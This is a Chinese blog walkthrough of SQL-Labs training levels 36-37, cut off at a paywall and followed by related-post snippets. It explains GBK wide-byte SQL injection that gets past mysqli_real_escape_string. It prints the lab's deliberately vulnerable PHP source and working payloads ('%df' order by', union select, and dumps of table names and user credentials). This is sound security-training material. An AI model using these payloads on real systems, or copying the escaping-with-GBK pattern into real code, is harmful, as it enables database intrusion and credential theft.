SQL-Labs靶场“36-37”关通关教程

原创 已于 2024-07-25 12:05:56 修改 · 3.7k 阅读 · 37 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #网络安全 #渗透测试 #OSWAP #PHP #SQL-Labs

于 2024-03-19 08:00:00 首次发布

君衍.


SQL-Labs靶场通关教程:

SQL注入第一课

SQL无列名注入

SQL报错注入原理

简单的SQL练习,联合注入、报错注入

POST提交方式注入

HTTP头部注入

二次注入

一些绕过案例

HTTP参数污染攻击

一、36关 GET单引号宽字节注入

请求方式 注入类型 拼接方式
GET 联合、报错、布尔盲注、延时盲注 id=‘$id’

首先我们进行测试(使用?id=1\,查看过滤后的回显)
在这里插入图片描述这里可以看到对我们的注释符进行了注释以及单双引号进行测试会发现都是如此:
在这里插入图片描述
在这里插入图片描述
所以这里我们判断使用了过滤函数进行了过滤,所以我们首先查看源码。

1、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
error_reporting(0);
function check_quotes($con1, $string)
{
   
   $string=mysqli_real_escape_string($con1, $string);    
    return $string;
}
// take the variables 
if(isset($_GET['id']))
{
   
   
$id=check_quotes($con1, $_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity 
mysqli_query($con1, "SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysqli_query($con1, $sql);
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if($row)
	{
   
   
  	echo 'Your Login name:'. $row['username'];
  	echo 'Your Password:' .$row['password'];
  	}
	else 
	{
   
   
	print_r(mysqli_error($con1));
	}
}
	else {
   
    echo "Please input the ID as parameter with numeric value";}
?>

源码大致与前几关相同,都是先过滤,后查询,查询成功输出查询到的信息,如果没有查询成功,那么输出报错信息。我们主要看下这个过滤函数,从而计划如何进行绕过:

function check_quotes($con1, $string)
{
   
   $string=mysqli_real_escape_string($con1, $string);    
    return $string;
}

可以看到里面主要使用了mysqli_real_escape_string函数,在官网进行查看:
在这里插入图片描述
可以看到官网说明对SQL语句特殊字符进行转义:

危险字符 转义后
\ \\
' \'
" \"

我们可以看到其实和前几关差不多,尤其32关,就过滤函数不一样,剩下的都一样。

2、联合查询注入

上面我们消除了转义符号的威胁,下面我们即可轻松的搭配别的注入方式完成注入,之前通过源码分析,由于查询成功输出了查询到的信息,所以我们将使用联合查询的方式完成注入。

1、猜测字段

?id=1%df' order by 4--+

在这里插入图片描述

从上面我们可以看到并没有第四列,所以我们尝试使用3来进行测试:

?id=1%df' order by 3--+

在这里插入图片描述
可以看到这里显示了通过1查询到的信息,所以后面的内容为真,即为该表的列数为3列,下面我们测试使用联合查询进行注入:

2、测试使用联合查询注入观察回显

?id=-1%df' union select 1,2,3--+

在这里插入图片描述

这里我们可以看到回显的点在2与3字段,所以我们直接随便选一个更改payload完成注入即可:

3、爆出数据库中的表名

?id=-1%df' union select  1,group_concat(table_name)
最低0.47元/天 解锁文章

200万优质内容无限畅学
sql注入靶场通关
xiaoyang0475的博客
07-03 1453
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入点?id=1查看是否存在注入点确定存在注入点将后面进行注释查看页面回显页面回显正常判断注入方式为字符型注入。
sqli-abs靶场通关记录(持续更新中)
宝儿姐的博客
08-11 1365
id=1’ and 1=1–+/#和?id=1’ and 1=2–+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。id=1’order by 3 --+,这里的数字是从小往大了试的,知道出现错误时,那么列数就是前面那一个正常值。1.1判断是否存在sql注入。.
sqli-labs靶场通关攻略
test_zpx的博客
08-14 4775
Good Good Study,Day Day Up!
SQL_LABS全部通关教程
最新发布
m0_75169999的博客
07-09 347
sql_labs通关详细教程
SQLI-LABS 靶场通关小记(1~22)
曹振国的博客
07-14 4037
1~22Less-1:1.查询字段数2.查询输出点3.查询库名4.查询表名5.查询字段名6.查询数据Less-2:1.查询输出点Less-3:1.查询输出点Less-4:1.查询输出点Less -5:1.使用left()函数进行截取测试2.使用length判断长度3.利用ascii码猜测数据库名4.使用二分法进行盲注查表名Less-6:1.使用length判断长度Less-7:1.查看源码2.写入一句话木马连接蚁剑Less-8:1.使用length判断长度Less-9:1.使用sleep()函数进行时间盲注
sqli-labs 靶场通关(1-10)
知世郎
10-15 2941
第七当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的卡不一样,之前都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
SQL-Labs靶场“46-50”通关教程
热门推荐
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
Sql-labs 靶场搭建及通关
m0_74825074的博客
01-21 1297
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。
SQL-Labs靶场“34-35”通关教程
钟言的博客
03-18 2865
本篇为SQL-Labs靶场的34到35教程,详细内容包含了:34 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
sqli-labs靶场通关(11-20)
Fly_Mojito的博客
06-14 686
sqli-labs靶场通关(11-20)
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 4299
sqli-labs靶场通关(1-10)
靶场通关报告-sqlilabs
2302_80256359的博客
12-02 1430
sqlilabs靶场通关
Pikachu 靶场 SQL 注入通关解析
Flag少侠的博客
05-14 3332
SQL注入是一种安全漏洞,它可以允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。这种漏洞通常出现在需要用户输入数据并将其作为SQL查询的地方,如登录表单、搜索功能、用户注册等。SQL注入的原理是应用程序没有充分验证和过滤用户输入,而是将用户输入直接拼接到SQL查询中,从而导致恶意的SQL代码被执行。攻击者可以通过注入恶意代码来绕过身份验证、获取敏感数据、修改数据库内容或执行其他未经授权的操作。
sqli-labs靶场通关攻略(1-20)
kknifek的博客
08-14 1772
sql手工注入
Sqli-labs-master靶场1-23通关详细教程(基础篇)
一纸荒芜的博客
06-23 6092
Sqli-labs-master靶场1-23通关详细教程(基础篇)
sqli-labs-master靶场[超详细通关教程通关攻略~!]
muyuchen110的博客
07-22 3353
sqli-labs-master[超详细通关教程通关攻略~!](附解题思路及各注入方法解析)-------持续更新通关教程!!!!
SQL注入靶场 RedTiger通关教程(level1~level10)
0xuu的博客
07-07 1527
SQL注入靶场RedTiger's Hackit 通关教程;RedTiger通关教程(level1~level10)
sqli靶场1,2,3通关秘籍详解
agrilly的博客
06-15 287
sqli靶场1,2,3通关秘籍详解
SQL-Labs靶场“29-31”通关教程
钟言的博客
02-27 1万+
本篇为SQL-Labs靶场第29-31通关教程,详细内容包含了:一、二十九 基于错误的WAF单引号注入 1、源码分析 2、HTTP参数污染 3、联合查询注入 4、updatexml报错注入 二、三十 基于错误的WAF双引号注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 三、三十一 基于错误的WAF双引号括 1、源码分析 2、联合查询注入 3、updatexml报错注入等等
sql-labs靶场通关
01-13
### SQL注入实验环境 sqli-labs 靶场解题思路 #### less17: Union 注入基础 Union查询是一种常见的SQL注入手法,通过`UNION SELECT`语句可以将额外的数据集附加到原始查询的结果集中。为了成功执行这种攻击,两个查询返回的列数必须相同,并且数据类型的兼容性也要匹配。 对于less17来说,目标是在存在漏洞的应用程序参数中构造有效的payload来获取敏感信息。例如,在给定条件下可以通过如下方式尝试读取当前使用的数据库名称: ```sql ?id=-1' UNION SELECT 1,database() -- ``` 上述命令利用了闭合单引号后的逻辑错误并追加了一个新的SELECT子句[^1]。 #### 获取MySQL版本与数据库名 进一步探索时,除了了解正在操作哪个具体的数据库外,知道服务器上运行的是哪一个版本也是非常有用的。这有助于判断可能存在的特定弱点或特性。下面是一个用于同时检索这两个值的例子: ```sql ?id=-1' UNION SELECT 1,CONCAT(version(),'|',database()) -- ``` 此表达式会连接MySQL版本字符串和活动库的名字作为第二列的内容输出[^2]。 #### 枚举用户名密码哈希值 一旦掌握了足够的背景知识之后就可以转向更深入的信息挖掘工作——比如从用户表里提取账户凭证。这里展示了一种方法用来列举所有用户的登录凭据(假设字段名为username,password),并且用特殊字符分隔开它们以便于解析: ```sql ?id=-1' UNION SELECT 1,GROUP_CONCAT(username,'~',password) FROM users -- ``` 这段代码将会把所有的用户名及其对应的散列形式的口令组合成单一字符串返回给调用者[^4]。 请注意,以上内容仅限学习研究目的使用;实际环境中未经授权擅自访问他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值